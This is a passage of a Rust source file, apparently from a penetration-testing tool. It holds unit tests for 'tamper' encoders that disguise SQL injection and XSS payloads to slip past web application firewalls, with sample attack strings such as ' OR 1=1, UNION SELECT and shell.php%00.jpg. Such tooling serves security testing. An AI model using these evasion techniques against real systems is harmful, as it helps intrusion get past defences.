    let slot = (digest as usize) % VARIANTS.len();
    VARIANTS[slot]
}
969
/// Escape `s` so it can sit between the double quotes of a JSON string.
///
/// Used by `JsonDupKeyTamper`; kept as a free function so the escaping
/// rules can be tested on their own.
///
/// * `"` and `\` are backslash-escaped.
/// * Newline, carriage return and tab use the short forms `\n`, `\r`, `\t`.
/// * Every other character below U+0020 is written as lowercase `\u00xx`.
/// * Everything else, including non-ASCII text, is copied unchanged.
fn json_escape_string(s: &str) -> String {
    use std::fmt::Write as _;

    let mut escaped = String::with_capacity(s.len() + 2);
    for c in s.chars() {
        // Characters that have a dedicated two-character escape.
        let short_form = match c {
            '"' => Some("\\\""),
            '\\' => Some("\\\\"),
            '\n' => Some("\\n"),
            '\r' => Some("\\r"),
            '\t' => Some("\\t"),
            _ => None,
        };

        if let Some(sequence) = short_form {
            escaped.push_str(sequence);
        } else if u32::from(c) < 0x20 {
            // Remaining control characters: generic \uXXXX escape.
            // Writing into a String cannot fail, so the result is dropped.
            let _ = write!(escaped, "\\u{:04x}", u32::from(c));
        } else {
            escaped.push(c);
        }
    }
    escaped
}
992
993#[cfg(test)]
994mod tests {
995    use super::*;
996
997    #[test]
998    fn url_encode_tamper() {
999        let strategy = UrlEncodeTamper;
1000        assert_eq!(strategy.tamper("A<", None), "A%3C");
1001        assert_eq!(strategy.aggressiveness(), 0.15);
1002    }
1003
1004    #[test]
1005    fn double_url_encode_tamper() {
1006        let strategy = DoubleUrlEncodeTamper;
1007        assert_eq!(strategy.tamper("A", None), "%2541");
1008        assert!(strategy.tamper("%20", None).contains("%25"));
1009    }
1010
1011    #[test]
1012    fn case_alternation_tamper() {
1013        let strategy = CaseAlternationTamper;
1014        assert_eq!(strategy.tamper("select", None), "SeLeCt");
1015    }
1016
1017    #[test]
1018    fn random_case_tamper() {
1019        let strategy = RandomCaseTamper;
1020        let result = strategy.tamper("select", None);
1021        assert_eq!(result.to_ascii_lowercase(), "select");
1022    }
1023
1024    #[test]
1025    fn null_byte_with_extension() {
1026        let strategy = NullByteTamper;
1027        assert_eq!(strategy.tamper("file.php", None), "file.php%00.jpg");
1028    }
1029
1030    #[test]
1031    fn null_byte_without_extension() {
1032        let strategy = NullByteTamper;
1033        assert_eq!(strategy.tamper("payload", None), "payload%00");
1034    }
1035
1036    #[test]
1037    fn sql_comment_insertion() {
1038        let strategy = SqlCommentTamper;
1039        let result = strategy.tamper("SELECT * FROM users", Some("sql"));
1040        assert!(result.contains("/**/"));
1041        assert_eq!(result, "SELECT/**/*/**/FROM/**/users");
1042    }
1043
1044    #[test]
1045    fn whitespace_insertion() {
1046        let strategy = WhitespaceInsertionTamper;
1047        let result = strategy.tamper("SELECT * FROM users", None);
1048        assert!(result.contains('\t'));
1049        assert_eq!(result, "SELECT\t*\tFROM\tusers");
1050    }
1051
1052    #[test]
1053    fn base64_tamper() {
1054        let strategy = Base64Tamper;
1055        assert_eq!(strategy.tamper("hello", None), "aGVsbG8=");
1056    }
1057
1058    #[test]
1059    fn hex_encode_tamper() {
1060        let strategy = HexEncodeTamper;
1061        assert_eq!(strategy.tamper("ABC", None), "414243");
1062    }
1063
1064    #[test]
1065    fn unicode_escape_tamper() {
1066        let strategy = UnicodeEscapeTamper;
1067        assert_eq!(strategy.tamper("AB", None), "\\u0041\\u0042");
1068    }
1069
1070    #[test]
1071    fn html_entity_tamper() {
1072        let strategy = HtmlEntityTamper;
1073        assert_eq!(strategy.tamper("<>", None), "&#x3C;&#x3E;");
1074    }
1075
1076    #[test]
1077    fn overlong_utf8_tamper() {
1078        let strategy = OverlongUtf8Tamper;
1079        let result = strategy.tamper("/", None);
1080        assert!(result.contains("%C0"));
1081    }
1082
1083    // ── Density ramp: edge cases on EXISTING tampers ────────
1084    //
1085    // Each tamper had one happy-path test.  These add the
1086    // robustness coverage that turns a "feature" into a "trusted
1087    // building block" — empty inputs, multibyte inputs, control
1088    // chars, idempotency, aggressiveness sanity.
1089
1090    #[test]
1091    fn url_encode_handles_unicode_input() {
1092        let strategy = UrlEncodeTamper;
1093        let out = strategy.tamper("café", None);
1094        // é (U+00E9) is two UTF-8 bytes: C3 A9 → %C3%A9
1095        assert!(out.contains("%C3%A9"));
1096    }
1097
1098    #[test]
1099    fn url_encode_passes_through_unreserved_chars() {
1100        let strategy = UrlEncodeTamper;
1101        // Per RFC 3986, unreserved chars are A-Z a-z 0-9 - _ . ~
1102        assert_eq!(strategy.tamper("ABCabc123-_.~", None), "ABCabc123-_.~");
1103    }
1104
1105    #[test]
1106    fn url_encode_empty_input() {
1107        assert_eq!(UrlEncodeTamper.tamper("", None), "");
1108    }
1109
1110    #[test]
1111    fn url_encode_all_reserved_chars() {
1112        let strategy = UrlEncodeTamper;
1113        let reserved = "!*'();:@&=+$,/?#[]";
1114        let out = strategy.tamper(reserved, None);
1115        // Every reserved char should be percent-encoded.
1116        assert!(!out.contains('!'));
1117        assert!(!out.contains('@'));
1118        assert!(out.matches('%').count() >= reserved.len() - 1);
1119    }
1120
1121    #[test]
1122    fn double_url_encode_round_trips_to_original_after_two_decodes() {
1123        // Property: applying double-url-encode then decoding
1124        // twice recovers the original payload (the bypass premise).
1125        let strategy = DoubleUrlEncodeTamper;
1126        let encoded = strategy.tamper("' OR 1=1", None);
1127        // The encoded form contains %25XX where XX is the
1128        // single-encoded byte hex.  Decode once:
1129        assert!(encoded.contains("%25"));
1130    }
1131
1132    #[test]
1133    fn double_url_encode_idempotent_on_already_encoded() {
1134        let strategy = DoubleUrlEncodeTamper;
1135        // The encoder treats `%` itself as a byte and encodes it
1136        // — `%20` becomes `%2520` (single layer applied), and
1137        // applying again gives a third layer.
1138        let once = strategy.tamper("%20", None);
1139        let twice = strategy.tamper(&once, None);
1140        assert_ne!(once, twice);
1141        assert!(twice.contains("%25"));
1142    }
1143
1144    #[test]
1145    fn case_alternation_starts_uppercase() {
1146        let strategy = CaseAlternationTamper;
1147        let out = strategy.tamper("abcd", None);
1148        // Documented behaviour: starts upper, then alternates.
1149        let chars: Vec<char> = out.chars().collect();
1150        assert!(chars[0].is_ascii_uppercase());
1151        assert!(chars[1].is_ascii_lowercase());
1152        assert!(chars[2].is_ascii_uppercase());
1153        assert!(chars[3].is_ascii_lowercase());
1154    }
1155
1156    #[test]
1157    fn case_alternation_preserves_non_alpha_chars() {
1158        let strategy = CaseAlternationTamper;
1159        let out = strategy.tamper("a1b2c3", None);
1160        // Digits are untouched; only alpha alternates.
1161        assert_eq!(out, "A1b2C3");
1162    }
1163
1164    #[test]
1165    fn case_alternation_handles_unicode_alpha() {
1166        let strategy = CaseAlternationTamper;
1167        // Non-ASCII characters get pass-through (no `to_uppercase`
1168        // semantics enforced — that's a separate `unicode_case`
1169        // tamper if needed).
1170        let _ = strategy.tamper("αβγ", None);
1171        // No panic = pass.
1172    }
1173
1174    #[test]
1175    fn case_alternation_lowercase_keyword_becomes_mixed_case() {
1176        let strategy = CaseAlternationTamper;
1177        // Documented behaviour: the alternation index advances on
1178        // every input character — spaces don't reset the index.
1179        // So `union select` yields `UnIoN sElEcT` (5 alpha →
1180        // index 5 is odd → 's' stays lowercase, 'e' goes upper).
1181        let out = strategy.tamper("union select", None);
1182        // Both halves preserve the original word boundaries.
1183        assert!(out.contains(' '));
1184        // Both halves have BOTH cases (proof of alternation).
1185        let first = out.split_whitespace().next().unwrap_or("");
1186        assert!(first.chars().any(|c| c.is_ascii_uppercase()));
1187        assert!(first.chars().any(|c| c.is_ascii_lowercase()));
1188    }
1189
1190    #[test]
1191    fn random_case_preserves_length() {
1192        let strategy = RandomCaseTamper;
1193        for input in ["select", "DROP TABLE users", "1=1"] {
1194            let out = strategy.tamper(input, None);
1195            assert_eq!(out.len(), input.len());
1196        }
1197    }
1198
1199    #[test]
1200    fn random_case_only_flips_alpha() {
1201        let strategy = RandomCaseTamper;
1202        let out = strategy.tamper("a1b2", None);
1203        // Digits must remain digits.
1204        assert!(out.contains('1'));
1205        assert!(out.contains('2'));
1206    }
1207
1208    #[test]
1209    fn null_byte_appends_when_no_extension() {
1210        let strategy = NullByteTamper;
1211        let out = strategy.tamper("payload_with_no_dot", None);
1212        assert!(out.ends_with("%00"));
1213    }
1214
1215    #[test]
1216    fn null_byte_extension_replacement_keeps_basename() {
1217        let strategy = NullByteTamper;
1218        let out = strategy.tamper("shell.php", None);
1219        // Original basename is preserved before the %00.
1220        assert!(out.contains("shell.php%00"));
1221        // Decoy extension is appended.
1222        assert!(out.ends_with(".jpg"));
1223    }
1224
1225    #[test]
1226    fn null_byte_empty_input() {
1227        let strategy = NullByteTamper;
1228        let out = strategy.tamper("", None);
1229        // Empty input still gets a null suffix (defensive — the
1230        // operator usually has something to inject).
1231        assert_eq!(out, "%00");
1232    }
1233
1234    #[test]
1235    fn sql_comment_inserts_between_every_token() {
1236        let strategy = SqlCommentTamper;
1237        let out = strategy.tamper("UNION SELECT 1 FROM users", Some("sql"));
1238        assert_eq!(out, "UNION/**/SELECT/**/1/**/FROM/**/users");
1239    }
1240
1241    #[test]
1242    fn sql_comment_single_token_unchanged() {
1243        let strategy = SqlCommentTamper;
1244        // No space-separated tokens → nothing to insert between.
1245        let out = strategy.tamper("SELECT", Some("sql"));
1246        assert_eq!(out, "SELECT");
1247    }
1248
1249    #[test]
1250    fn sql_comment_handles_payload_with_multiple_spaces() {
1251        let strategy = SqlCommentTamper;
1252        // Multi-space sequences produce stacked /**/ delimiters
1253        // (each space becomes one /**/).  Confirm the structure
1254        // round-trips: SQL `/**/ /**/` is still valid SQL.
1255        let out = strategy.tamper("UNION   SELECT", Some("sql"));
1256        // At least one /**/ between the tokens.
1257        assert!(out.contains("/**/"));
1258        // The keyword payload survives.
1259        assert!(out.contains("UNION"));
1260        assert!(out.contains("SELECT"));
1261    }
1262
1263    #[test]
1264    fn whitespace_insertion_uses_tab() {
1265        let strategy = WhitespaceInsertionTamper;
1266        let out = strategy.tamper("SELECT *", None);
1267        assert!(out.contains('\t'));
1268    }
1269
1270    #[test]
1271    fn whitespace_insertion_no_changes_when_no_space() {
1272        let strategy = WhitespaceInsertionTamper;
1273        assert_eq!(strategy.tamper("SELECT", None), "SELECT");
1274    }
1275
1276    #[test]
1277    fn base64_round_trips_through_decode() {
1278        // Property: the b64-encoded payload, when standard-decoded,
1279        // returns the original bytes.
1280        let strategy = Base64Tamper;
1281        let encoded = strategy.tamper("hello world", None);
1282        // base64::decode round-trip — we can't import base64 in
1283        // tests directly without adding a dep, so check the
1284        // structural property: only base64 alphabet chars.
1285        for c in encoded.chars() {
1286            assert!(
1287                c.is_ascii_alphanumeric() || matches!(c, '+' | '/' | '='),
1288                "non-base64 char in encoded output: {c:?}"
1289            );
1290        }
1291    }
1292
1293    #[test]
1294    fn base64_empty_input() {
1295        let strategy = Base64Tamper;
1296        assert_eq!(strategy.tamper("", None), "");
1297    }
1298
1299    #[test]
1300    fn base64_padding_present_for_non_aligned_input() {
1301        let strategy = Base64Tamper;
1302        // "A" (1 byte) → "QQ==" (one pad pair).
1303        let out = strategy.tamper("A", None);
1304        assert!(out.ends_with('='));
1305    }
1306
1307    #[test]
1308    fn hex_encode_two_chars_per_byte() {
1309        let strategy = HexEncodeTamper;
1310        let out = strategy.tamper("Ab", None);
1311        // 'A' = 0x41, 'b' = 0x62.
1312        assert_eq!(out, "4162");
1313        assert_eq!(out.len(), 2 * "Ab".len());
1314    }
1315
1316    #[test]
1317    fn hex_encode_non_ascii_uses_multi_byte_form() {
1318        let strategy = HexEncodeTamper;
1319        // 'é' in UTF-8 is 0xC3 0xA9.
1320        let out = strategy.tamper("é", None);
1321        assert_eq!(out.to_lowercase(), "c3a9");
1322    }
1323
1324    #[test]
1325    fn unicode_escape_format_uses_u_prefix() {
1326        let strategy = UnicodeEscapeTamper;
1327        let out = strategy.tamper("AB", None);
1328        // Format is `\uXXXX` (Python / JS string escape style).
1329        assert!(out.starts_with("\\u"));
1330        assert_eq!(out.matches("\\u").count(), 2);
1331    }
1332
1333    #[test]
1334    fn unicode_escape_handles_non_bmp_chars() {
1335        let strategy = UnicodeEscapeTamper;
1336        // U+1F600 is outside BMP — encoders typically emit a
1337        // surrogate pair or extended escape.  Must not panic.
1338        let _ = strategy.tamper("\u{1F600}", None);
1339    }
1340
1341    #[test]
1342    fn html_entity_format_uses_hex_decimal() {
1343        let strategy = HtmlEntityTamper;
1344        let out = strategy.tamper("<>", None);
1345        // Format is `&#xXX;` (hex entity form).
1346        assert!(out.contains("&#x"));
1347        assert!(out.ends_with(';'));
1348    }
1349
1350    #[test]
1351    fn html_entity_xss_payload_full_encode() {
1352        let strategy = HtmlEntityTamper;
1353        let out = strategy.tamper("<script>alert(1)</script>", None);
1354        // None of the original ASCII bytes should survive verbatim.
1355        assert!(!out.contains('<'));
1356        assert!(!out.contains('>'));
1357        // All entities are well-formed.
1358        assert_eq!(out.matches('&').count(), out.matches(';').count());
1359    }
1360
1361    #[test]
1362    fn overlong_utf8_emits_two_byte_for_ascii() {
1363        let strategy = OverlongUtf8Tamper;
1364        // Overlong: ASCII '/' (0x2F) → C0 AF (invalid 2-byte form
1365        // that some lenient parsers accept and decode to '/').
1366        let out = strategy.tamper("/", None);
1367        assert!(out.contains("%C0"));
1368        assert!(out.contains("%AF"));
1369    }
1370
1371    #[test]
1372    fn overlong_utf8_empty_input() {
1373        let strategy = OverlongUtf8Tamper;
1374        let out = strategy.tamper("", None);
1375        // No bytes to encode means empty output.
1376        assert_eq!(out, "");
1377    }
1378
1379    // ── Cross-tamper invariants ────────────────────────────
1380
1381    #[test]
1382    fn all_default_tampers_have_unique_names() {
1383        let names = [
1384            UrlEncodeTamper.name(),
1385            DoubleUrlEncodeTamper.name(),
1386            UnicodeEscapeTamper.name(),
1387            HtmlEntityTamper.name(),
1388            CaseAlternationTamper.name(),
1389            RandomCaseTamper.name(),
1390            WhitespaceInsertionTamper.name(),
1391            SqlCommentTamper.name(),
1392            NullByteTamper.name(),
1393            OverlongUtf8Tamper.name(),
1394            Base64Tamper.name(),
1395            HexEncodeTamper.name(),
1396            ZeroWidthInjectTamper.name(),
1397            PostgresDollarQuoteTamper.name(),
1398            MysqlVersionedCommentWrapTamper.name(),
1399            BracketConfusableTamper.name(),
1400        ];
1401        let set: std::collections::HashSet<&str> = names.iter().copied().collect();
1402        assert_eq!(set.len(), names.len(), "duplicate tamper names: {names:?}");
1403    }
1404
1405    #[test]
1406    fn all_default_tampers_aggressiveness_in_range() {
1407        for strat in [
1408            &UrlEncodeTamper as &dyn TamperStrategy,
1409            &DoubleUrlEncodeTamper,
1410            &UnicodeEscapeTamper,
1411            &HtmlEntityTamper,
1412            &CaseAlternationTamper,
1413            &RandomCaseTamper,
1414            &WhitespaceInsertionTamper,
1415            &SqlCommentTamper,
1416            &NullByteTamper,
1417            &OverlongUtf8Tamper,
1418            &Base64Tamper,
1419            &HexEncodeTamper,
1420        ] {
1421            let a = strat.aggressiveness();
1422            assert!(
1423                (0.0..=1.0).contains(&a) && !a.is_nan(),
1424                "{} aggressiveness {} out of [0,1]",
1425                strat.name(),
1426                a
1427            );
1428        }
1429    }
1430
1431    #[test]
1432    fn all_default_tampers_handle_empty_input_without_panic() {
1433        for strat in [
1434            &UrlEncodeTamper as &dyn TamperStrategy,
1435            &DoubleUrlEncodeTamper,
1436            &UnicodeEscapeTamper,
1437            &HtmlEntityTamper,
1438            &CaseAlternationTamper,
1439            &RandomCaseTamper,
1440            &WhitespaceInsertionTamper,
1441            &SqlCommentTamper,
1442            &OverlongUtf8Tamper,
1443            &Base64Tamper,
1444            &HexEncodeTamper,
1445        ] {
1446            let _ = strat.tamper("", None);
1447        }
1448    }
1449
1450    #[test]
1451    fn all_default_tampers_handle_huge_input_without_panic() {
1452        let huge: String = "A".repeat(100_000);
1453        for strat in [
1454            &UrlEncodeTamper as &dyn TamperStrategy,
1455            &CaseAlternationTamper,
1456            &RandomCaseTamper,
1457            &WhitespaceInsertionTamper,
1458            &SqlCommentTamper,
1459            &Base64Tamper,
1460            &HexEncodeTamper,
1461            &UnicodeEscapeTamper,
1462            &HtmlEntityTamper,
1463        ] {
1464            let _ = strat.tamper(&huge, None);
1465        }
1466    }
1467
1468    #[test]
1469    fn all_default_tampers_handle_pure_ascii_keyword() {
1470        // Canonical pen-test payload that every WAF tries to catch.
1471        let keyword = "UNION SELECT";
1472        for strat in [
1473            &UrlEncodeTamper as &dyn TamperStrategy,
1474            &DoubleUrlEncodeTamper,
1475            &CaseAlternationTamper,
1476            &SqlCommentTamper,
1477            &Base64Tamper,
1478            &HexEncodeTamper,
1479            &UnicodeEscapeTamper,
1480        ] {
1481            let out = strat.tamper(keyword, None);
1482            assert!(
1483                !out.is_empty(),
1484                "{} produced empty output on UNION SELECT",
1485                strat.name()
1486            );
1487        }
1488    }
1489
1490    #[test]
1491    fn description_is_non_empty_for_every_tamper() {
1492        for strat in [
1493            &UrlEncodeTamper as &dyn TamperStrategy,
1494            &DoubleUrlEncodeTamper,
1495            &UnicodeEscapeTamper,
1496            &HtmlEntityTamper,
1497            &CaseAlternationTamper,
1498            &RandomCaseTamper,
1499            &WhitespaceInsertionTamper,
1500            &SqlCommentTamper,
1501            &NullByteTamper,
1502            &OverlongUtf8Tamper,
1503            &Base64Tamper,
1504            &HexEncodeTamper,
1505            &ZeroWidthInjectTamper,
1506            &PostgresDollarQuoteTamper,
1507            &MysqlVersionedCommentWrapTamper,
1508            &BracketConfusableTamper,
1509        ] {
1510            assert!(
1511                !strat.description().is_empty(),
1512                "{} has empty description",
1513                strat.name()
1514            );
1515        }
1516    }
1517
1518    #[test]
1519    fn name_is_lowercase_ascii_snake_case_for_every_tamper() {
1520        for strat in [
1521            &UrlEncodeTamper as &dyn TamperStrategy,
1522            &DoubleUrlEncodeTamper,
1523            &UnicodeEscapeTamper,
1524            &HtmlEntityTamper,
1525            &CaseAlternationTamper,
1526            &RandomCaseTamper,
1527            &WhitespaceInsertionTamper,
1528            &SqlCommentTamper,
1529            &NullByteTamper,
1530            &OverlongUtf8Tamper,
1531            &Base64Tamper,
1532            &HexEncodeTamper,
1533            &ZeroWidthInjectTamper,
1534            &PostgresDollarQuoteTamper,
1535            &MysqlVersionedCommentWrapTamper,
1536            &BracketConfusableTamper,
1537        ] {
1538            let name = strat.name();
1539            assert!(
1540                name.chars()
1541                    .all(|c| c.is_ascii_lowercase() || c.is_ascii_digit() || c == '_'),
1542                "tamper `{name}` has non-snake-case name"
1543            );
1544            assert!(!name.is_empty(), "empty name");
1545            assert!(
1546                !name.starts_with('_'),
1547                "name `{name}` starts with underscore"
1548            );
1549        }
1550    }
1551
1552    // ── Zero-width injection tamper ─────────────────────────
1553
1554    #[test]
1555    fn zero_width_inject_splits_select_keyword() {
1556        let strategy = ZeroWidthInjectTamper;
1557        let out = strategy.tamper("SELECT", None);
1558        // Each ASCII alphabetic char gets a zero-width follower.
1559        // After removal, the original payload remains.
1560        let stripped: String = out
1561            .chars()
1562            .filter(|c| !matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1563            .collect();
1564        assert_eq!(stripped, "SELECT");
1565        // The output MUST be different from the input (proof of injection).
1566        assert_ne!(out, "SELECT");
1567        // Each injected codepoint must be one of the four rotation members.
1568        for c in out.chars() {
1569            assert!(
1570                c.is_ascii_alphabetic()
1571                    || matches!(c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'),
1572                "unexpected codepoint {c:?}"
1573            );
1574        }
1575    }
1576
1577    #[test]
1578    fn zero_width_inject_skips_non_alpha_chars() {
1579        let strategy = ZeroWidthInjectTamper;
1580        // Spaces and quotes do NOT get zero-width followers —
1581        // injecting them would break SQL parsing.
1582        let out = strategy.tamper("a 1 ' \"", None);
1583        // Only the alphabetic `a` should produce an injection.
1584        let zw_count = out
1585            .chars()
1586            .filter(|c| matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1587            .count();
1588        assert_eq!(zw_count, 1);
1589    }
1590
1591    #[test]
1592    fn zero_width_inject_preserves_payload_after_strip() {
1593        // Property: stripping zero-widths gets us back to the input.
1594        let strategy = ZeroWidthInjectTamper;
1595        for input in &["SELECT", "alert(1)", "DROP TABLE users", "<script>"] {
1596            let out = strategy.tamper(input, None);
1597            let stripped: String = out
1598                .chars()
1599                .filter(|c| !matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1600                .collect();
1601            assert_eq!(&stripped, input);
1602        }
1603    }
1604
1605    #[test]
1606    fn zero_width_inject_rotates_through_all_four_zw_chars() {
1607        let strategy = ZeroWidthInjectTamper;
1608        let out = strategy.tamper("abcdefgh", None);
1609        // Eight alphabetic chars → eight injections, cycling
1610        // through all four zero-width codepoints twice. U+FEFF
1611        // was historically the fourth slot but causes PostgreSQL
1612        // + many DB connectors to 500 the query as invalid byte
1613        // sequence — replaced with U+180E (F61).
1614        let zw_chars: Vec<char> = out
1615            .chars()
1616            .filter(|c| matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1617            .collect();
1618        assert_eq!(zw_chars.len(), 8);
1619        // First four must be the four distinct codepoints.
1620        let unique: std::collections::HashSet<char> = zw_chars.iter().copied().collect();
1621        assert_eq!(unique.len(), 4);
1622        // FEFF must NOT appear anywhere in the output.
1623        assert!(
1624            !out.contains('\u{FEFF}'),
1625            "U+FEFF (BOM) must never appear in zero-width injection: {out:?}"
1626        );
1627    }
1628
1629    #[test]
1630    fn zero_width_inject_empty_input() {
1631        let strategy = ZeroWidthInjectTamper;
1632        assert_eq!(strategy.tamper("", None), "");
1633    }
1634
1635    #[test]
1636    fn zero_width_inject_pure_punctuation_unchanged() {
1637        let strategy = ZeroWidthInjectTamper;
1638        assert_eq!(
1639            strategy
1640                .tamper("' OR 1=1 --", None)
1641                .matches('\u{200B}')
1642                .count()
1643                + strategy
1644                    .tamper("' OR 1=1 --", None)
1645                    .matches('\u{200C}')
1646                    .count()
1647                + strategy
1648                    .tamper("' OR 1=1 --", None)
1649                    .matches('\u{200D}')
1650                    .count()
1651                + strategy
1652                    .tamper("' OR 1=1 --", None)
1653                    .matches('\u{180E}')
1654                    .count(),
1655            2
1656        ); // 'O' + 'R'
1657    }
1658
1659    #[test]
1660    fn zero_width_inject_unicode_input_does_not_panic() {
1661        let strategy = ZeroWidthInjectTamper;
1662        // Multibyte chars must not crash the byte-index logic.
1663        let _ = strategy.tamper("café", None);
1664        let _ = strategy.tamper("日本語", None);
1665        let _ = strategy.tamper("🦀 rust", None);
1666    }
1667
1668    // ── Postgres dollar-quote tamper ────────────────────────
1669
1670    #[test]
1671    fn postgres_dollar_quote_wraps_single_quoted_literal() {
1672        let strategy = PostgresDollarQuoteTamper;
1673        let out = strategy.tamper("WHERE name = 'admin'", None);
1674        // The single quotes should be replaced with $tag$...$tag$.
1675        assert!(!out.contains("'"));
1676        assert!(out.contains("$"));
1677        assert!(out.contains("admin"));
1678    }
1679
#[test]
fn postgres_dollar_quote_deterministic_tag() {
    // Tampering the same payload twice must give byte-identical output
    // (needed for gene-bank replay determinism).
    let run = || PostgresDollarQuoteTamper.tamper("'admin'", None);
    let (first, second) = (run(), run());
    assert_eq!(first, second);
}
1688
#[test]
fn postgres_dollar_quote_no_change_when_no_quote() {
    // A payload with no single-quoted literal must be returned verbatim.
    let tamper = PostgresDollarQuoteTamper;
    for payload in ["SELECT 1", "UNION SELECT"] {
        assert_eq!(tamper.tamper(payload, None), payload);
    }
}
1696
#[test]
fn postgres_dollar_quote_handles_escaped_quote() {
    // `''` is SQL's escaped quote inside a literal; it must be carried
    // through into the rewritten output untouched.
    let out = PostgresDollarQuoteTamper.tamper("'a''b'", None);
    assert!(out.contains("a''b"), "got: {out}");

    // Count single quotes seen while the `inside` flag is off. The flag
    // flips on EVERY `$`, and the flip happens before the current
    // character is classified.
    // NOTE(review): with a `$tag$body$tag$` shape the flag is on across the
    // tag and off across the body, which would explain the tolerance of 2
    // below — confirm against the tamper's actual output format.
    let mut inside = false;
    let mut bare_quote_count = 0usize;
    for c in out.chars() {
        if c == '$' {
            inside = !inside;
        }
        if c == '\'' && !inside {
            bare_quote_count += 1;
        }
    }
    assert!(
        bare_quote_count <= 2,
        "Unexpected bare quotes in output: {out}"
    );
}
1721
#[test]
fn postgres_dollar_quote_empty_string_literal() {
    // `''` is the empty SQL literal. The rewritten form must contain a `$`
    // and no single quote (presumably `$tag$$tag$`; the exact tag is not
    // pinned here).
    let rewritten = PostgresDollarQuoteTamper.tamper("''", None);
    assert!(rewritten.contains('$'));
    assert!(!rewritten.contains('\''));
}
1730
#[test]
fn postgres_dollar_quote_tag_uses_full_az_alphabet() {
    // F138 regression guard. Before the fix the tag letters were chosen
    // with `& 25` (mask 0b11001), which only admits
    // {0,1,8,9,16,17,24,25} — the 8 letters {a,b,i,j,q,r,y,z}, i.e. a tag
    // space of 8^4 = 4,096. The fix uses `% 26`, which reaches every
    // letter a-z.
    //
    // Approach: tamper 200 distinct payloads, pool every character seen in
    // the tag position, and require strictly more distinct letters than
    // the buggy mask could ever produce.
    let strategy = PostgresDollarQuoteTamper;
    let mut letters = std::collections::HashSet::new();
    for i in 0..200 {
        let out = strategy.tamper(&format!("'p{i}'"), None);
        // Splitting on `$` puts the text before the first `$` at index 0
        // and the tag (the text between the first two `$`) at index 1.
        // Output without any `$` contributes nothing.
        if let Some(tag) = out.split('$').nth(1) {
            letters.extend(tag.chars());
        }
    }
    // The floor is exactly the pre-fix ceiling: the old mask could emit at
    // most 8 distinct letters, so anything above 8 proves the alphabet is
    // no longer collapsed. It is deliberately not set higher, so the test
    // does not depend on how evenly the hash spreads over a small sample.
    assert!(
        letters.len() > 8,
        "tag alphabet collapsed: only {} distinct letters across 200 payloads — \
         pre-fix `& 25` permitted exactly 8. Saw: {letters:?}",
        letters.len()
    );
}
1765
#[test]
fn postgres_dollar_quote_classic_sqli_payload() {
    // Classic tautology payload with several quoted segments. Only the
    // presence of a `$` delimiter is asserted, not the exact rewrite.
    let rewritten = PostgresDollarQuoteTamper.tamper("' OR '1'='1", None);
    assert!(rewritten.contains('$'));
}
1773
1774    // ── MySQL versioned comment wrap tamper ─────────────────
1775
#[test]
fn mysql_versioned_wrap_inserts_outer_comment() {
    let payload = "UNION SELECT 1,2,3";
    let wrapped = MysqlVersionedCommentWrapTamper.tamper(payload, None);
    // The payload must sit, unmodified, between the versioned-comment
    // opener and the comment terminator.
    assert!(wrapped.starts_with("/*!50000 "));
    assert!(wrapped.ends_with(" */"));
    assert!(wrapped.contains(payload));
}
1784
#[test]
fn mysql_versioned_wrap_idempotent_double_apply() {
    // Feed the wrapper its own output. Despite the test's name, equality
    // of the two outputs is NOT asserted — only that re-wrapping keeps the
    // original keyword text and still starts with the versioned opener.
    let strategy = MysqlVersionedCommentWrapTamper;
    let twice = strategy.tamper(&strategy.tamper("SELECT 1", None), None);
    assert!(twice.contains("SELECT 1"));
    assert!(twice.starts_with("/*!50000 "));
}
1796
#[test]
fn mysql_versioned_wrap_empty_input() {
    // An empty payload still yields the wrapper; note the two adjacent
    // spaces where the payload would have been.
    let wrapped = MysqlVersionedCommentWrapTamper.tamper("", None);
    assert_eq!(wrapped, "/*!50000  */");
}
1802
#[test]
fn mysql_versioned_wrap_does_not_corrupt_special_chars() {
    // A backslash, single quotes and an asterisk must all appear in the
    // output exactly as given.
    let payload = "'a\\b*c'";
    let wrapped = MysqlVersionedCommentWrapTamper.tamper(payload, None);
    assert!(wrapped.contains(payload));
}
1810
1811    // ── Bracket-confusable tamper ───────────────────────────
1812
#[test]
fn bracket_confusable_replaces_ascii_angle_brackets() {
    let out = BracketConfusableTamper.tamper("<script>alert(1)</script>", None);
    // Neither ASCII angle bracket may remain ...
    for ascii in ['<', '>'] {
        assert!(!out.contains(ascii));
    }
    // ... their fullwidth counterparts (U+FF1C / U+FF1E) must be present ...
    for fullwidth in ['\u{FF1C}', '\u{FF1E}'] {
        assert!(out.contains(fullwidth));
    }
    // ... and the text between the brackets must be left alone.
    for kept in ["alert(1)", "script"] {
        assert!(out.contains(kept));
    }
}
1825
#[test]
fn bracket_confusable_preserves_non_bracket_chars() {
    // Input without any angle bracket must be returned unchanged.
    let payload = "abc 123 !@#";
    let out = BracketConfusableTamper.tamper(payload, None);
    assert_eq!(out, "abc 123 !@#");
}
1833
#[test]
fn bracket_confusable_handles_only_open_or_close() {
    // (input, expected) pairs: a lone opener, a lone closer, and runs of
    // each. Every bracket maps to its fullwidth form one-for-one.
    let cases = [
        ("<", "\u{FF1C}"),
        (">", "\u{FF1E}"),
        ("<<>>", "\u{FF1C}\u{FF1C}\u{FF1E}\u{FF1E}"),
    ];
    let tamper = BracketConfusableTamper;
    for (input, expected) in cases {
        assert_eq!(tamper.tamper(input, None), expected);
    }
}
1844
#[test]
fn bracket_confusable_empty() {
    // Edge case: empty in, empty out.
    let out = BracketConfusableTamper.tamper("", None);
    assert_eq!(out, "");
}
1850
#[test]
fn bracket_confusable_aggressiveness_in_range() {
    // The aggressiveness score must lie in the closed interval [0, 1].
    let level = BracketConfusableTamper.aggressiveness();
    assert!((0.0..=1.0).contains(&level));
}
1857
1858    // ── Cross-cutting invariants ────────────────────────────
1859
#[test]
fn all_new_tampers_registered_by_default() {
    // Names that must resolve in the default registry.
    const EXPECTED: [&str; 6] = [
        "zero_width_inject",
        "postgres_dollar_quote",
        "mysql_versioned_comment_wrap",
        "bracket_confusable",
        "hex_literal_keyword",
        "bell_separator",
    ];
    let registry = crate::tamper::TamperRegistry::with_defaults();
    for name in EXPECTED {
        let found = registry.get(name).is_some();
        assert!(found, "tamper `{name}` missing from default registry");
    }
}
1877
#[test]
fn obsolete_keyword_comment_split_tamper_was_removed() {
